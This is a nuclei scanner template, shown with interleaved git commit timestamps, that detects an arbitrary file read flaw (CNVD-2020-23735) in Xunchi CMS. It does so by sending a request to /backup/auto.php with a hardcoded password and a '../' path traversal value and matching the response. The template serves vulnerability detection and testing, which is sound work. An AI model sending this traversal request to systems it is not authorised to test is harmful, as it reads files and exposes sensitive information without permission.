nuclei-templates/cnvd/CNVD-2020-23735.yaml

26 lines
707 B
YAML
Raw Normal View History

2021-06-03 16:24:08 +00:00
id: CNVD-2020-23735
2021-04-23 13:15:02 +00:00
info:
2021-06-03 16:24:08 +00:00
name: Xxunchi Local File read
2021-04-23 13:15:02 +00:00
author: princechaddha
severity: medium
description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information.
reference: https://www.cnvd.org.cn/flaw/show/2025171
2021-06-03 16:24:08 +00:00
tags: xunchi,lfi,cnvd
2021-04-23 13:15:02 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php"
2021-06-03 16:24:08 +00:00
2021-04-23 13:15:02 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
- "display_errors"
part: body
2021-06-03 16:24:08 +00:00
condition: and